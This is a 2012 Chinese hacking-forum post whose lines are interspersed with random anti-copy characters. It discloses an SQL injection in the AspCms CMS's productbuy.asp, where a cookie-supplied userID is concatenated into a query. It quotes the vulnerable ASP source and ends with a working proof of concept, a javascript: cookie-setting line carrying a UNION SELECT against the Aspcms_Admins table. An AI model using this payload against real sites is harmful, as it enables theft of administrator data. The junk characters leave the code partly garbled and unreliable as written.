好久没上土司了,上来一看发现在删号名单内.....
' l' `% Z/ z& [7 r8 @4 D4 k7 ?也没啥好发的,前些天路过某个小站,用的AspCms这个系统,搜索了下,productbuy.asp这个文件存在注射,但是目标已经修补....下载了代码,很奇葩的是productbuy.asp这个文件官方虽然修补了网上提到的漏洞,但是就在同一个文件下面找到了注射漏洞。。。。。。。
) U0 X4 G" p F. B2 I废话不多说,看代码:. e+ N& n9 |1 G5 y
) u u8 D+ J4 N0 M7 A# u9 ~" `/ R
<%9 d, B" o9 Y6 ?/ n7 K9 B6 Q. M2 h$ D
4 M7 C0 e% Q# t( ?. Lif action = "buy" then6 D% }) j5 w+ i
4 h: _# k2 e) f: O4 N* W addOrder()3 z! f* O6 \, v! H
* j! X, m! \2 h; Celse |2 j9 v9 S* ~5 T! u
& H h& ?/ C; r
echoContent()2 z. u: n3 I a
; c; W* b4 u8 ]! `) i0 c& ?. b
end if
# r. `6 J3 h5 E7 `" P8 r u% G5 d; q+ P
$ W e( j+ Y* G$ G4 F; z" U& o% U8 v: z, D5 N1 e+ |, ?7 g
……略过
9 I4 S8 q# ^) {$ Y+ D M9 M6 m+ U$ L# j* q4 u8 v2 L
" W* b- T. ?# b
$ E E5 l4 D9 s4 w, aSub echoContent()
$ l( y7 m; u6 w0 n' V
' K" [/ C! @9 j+ A; ] dim id% [2 y; x8 j4 h, E" K6 `1 k
" t% @9 @) A( E7 x( p3 r
id=getForm("id","get"); w3 [: h" C& Q2 m2 f
# [4 O1 S& S9 N* h% j
" v0 H" v- p1 d. p6 C1 ?
, @" ]& O6 O1 ^5 P: u( O if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品!","-1"
/ t$ |' A: o1 a$ y1 F, U( @5 K6 F/ w$ k/ x0 Y6 V
1 M9 p. q4 o. c c- h: x& N* f
$ G7 i8 k3 K& `4 i# z- K dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template")
9 q' x$ ~4 L2 o1 [* W
: G2 ~% }" P& a' ? dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct- ^* \2 @3 [5 R- f3 Y
5 C3 k) [- y/ O. K: r Dim templatePath,tempStr0 @9 \" x9 @: ^7 {& G
Q# j. P4 _2 y/ V+ `) s3 e8 K5 B templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html"
, d& H2 Y3 ~( H# J" r5 N8 o" I y
' s3 a9 ?( K5 V8 z' s1 D$ L; u" l6 Z: w+ r0 ^% d8 {# a2 C$ y) I
set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1")
3 V% ?( R" _% P; e" L N; J+ Z5 r1 i" }+ j
selectproduct=rsObj(0)" P% o3 m' [! l& L
/ d2 O a/ J, V
5 C! H" p9 g0 W8 I2 d. ~- ^7 h# b E1 n# M
Dim linkman,gender,phone,mobile,email,qq,address,postcode4 B4 k* A2 x3 s: u* M, k |( \
8 w, A2 z. }( o/ ^( H. |
if isnul(rCookie("loginstatus")) then wCookie"loginstatus",0+ ~- O0 i* Q* Z) a- H* u6 H1 ]4 T& P
/ t( Y8 t8 W' B
if rCookie("loginstatus")=1 then
3 h; i0 y$ B. W4 s1 B7 D2 ~& O, d9 d; C$ q$ O
set rsObj=conn.Exec("select * from aspcms_Users where UserID="&trim(rCookie("userID")),"r1")
0 _6 w7 I' l$ ]" B6 \- b' P: D3 Q% [7 L5 S
linkman=rsObj("truename")
% G: _# i$ N ^, b9 h2 h, i9 _
gender=rsObj("gender")/ G: L0 q# w |$ v/ h1 h. V+ T! T
2 z$ U7 i, B9 U. j0 `
phone=rsObj("phone")
) K9 T: I. @5 S1 D, @+ U3 }$ m
0 |0 z9 m# s) ~3 b7 h1 l! S mobile=rsObj("mobile")
`% n! u$ s) i9 I! ?' |# a% p
- \) r) V( f7 {$ Y7 O7 B7 \ email=rsObj("email")
" |2 N8 y1 n' x, O. H$ b6 z5 L* [7 j
qq=rsObj("qq")/ _4 d5 _; y; t% ^" k( Y, c
: S, ]: h4 L# J$ X h, A
address=rsObj("address")+ Z. A2 c' K0 T5 o
& t6 c* [' N( \5 p postcode=rsObj("postcode")
6 ]1 |7 p. v) z
3 G, t; n0 I* S8 P& t! l) |4 n8 D) R else , w3 n9 d# H$ _
, D, g5 D; K6 @% {/ I
gender=1
9 _/ ?' B2 a0 H. X0 Y3 P* R( G6 k/ a
end if1 V# v/ c1 t# f6 k
# Z9 Q1 I& e2 g4 A
rsObj.close()
1 D( ]; S: n; i$ n& K6 o# x. `& @# V) Y2 x) o8 O% V# I
2 r) w5 X' l- d6 r0 l, ?
0 v/ r$ Z# I3 M8 _0 S& U
with templateObj 1 x7 ^9 L, U2 s6 c% H/ H, x
/ ` I6 b0 l1 a z$ ~. b
.content=loadFile(templatePath)
/ a/ V% U+ I h, j4 G3 c
, q; a% ^( R k; }! [# X5 Q5 W .parseHtml()" j& B7 Z/ @7 e* J. o. v
2 U+ G* U3 }0 n4 A" l0 a0 ^, J. H .content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct)
. \2 X* {7 Y. {( L, W
9 l0 \. u. B0 d8 _4 b .content=replaceStr(.content,"[aspcms:linkman]",linkman) , x6 A" j! @9 c7 R- g& k% M$ E
5 v; I! Z5 ~* W# ?4 |9 D .content=replaceStr(.content,"[aspcms:gender]",gender) , ]) j6 c- X" N
& n! {4 T7 B; s% R) b1 H
.content=replaceStr(.content,"[aspcms:phone]",phone)
+ }7 I. K- J9 p( O" Y
0 E7 y" k2 c4 n .content=replaceStr(.content,"[aspcms:mobile]",mobile)
. U# j! j3 g+ U/ c9 f" l) i
' ?* u' W9 X y2 i6 T! N/ Y3 A .content=replaceStr(.content,"[aspcms:email]",email)
1 t! z% s0 T1 ^# C
4 V% h: A N$ o# f0 G$ p* O .content=replaceStr(.content,"[aspcms:qq]",qq) 2 H( u0 `# t6 H- c3 @% E
" f8 h4 @2 L# e' Q7 T& J! _
.content=replaceStr(.content,"[aspcms:address]",address)
# B0 F! r- q0 D1 P8 ^- R$ u5 Q H7 Q+ ]
.content=replaceStr(.content,"[aspcms:postcode]",postcode)
; T- F3 G+ U4 |* b# Z* H1 B# M5 B! N$ D1 b; I2 v
.parseCommon() " m% ^0 V) p4 A( d7 z' s
2 r- m: E" x& u- N% u- _" B8 H/ ] echo .content
/ w, I/ Z! h# A+ x. ~8 j$ M `* s
end with: H8 |. E: g' M$ `& Q* m4 {& g% S
6 E; E9 C; E; P! F$ G set templateobj =nothing : terminateAllObjects7 g; D, Y& Y4 h- k- W
! H+ M7 ]* g1 h0 X2 s4 b
End Sub
0 a1 ^1 D( F( e, l% s H, O9 A漏洞很明显,没啥好说的
3 v5 U* D/ e9 j7 V4 f/ y6 \poc:
e1 @) T7 j( @9 P3 d
/ j( z+ |; e8 f' Gjavascript:alert(document.cookie="loginstatus=" + escape("1"));alert(document.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));另外,脚本板块没权限发帖子5 H) v7 {: a4 W% r& E( I6 m$ X
0 y+ L. g" i, | |
发表于 2012-12-27 08:35:05
收藏
支持
反对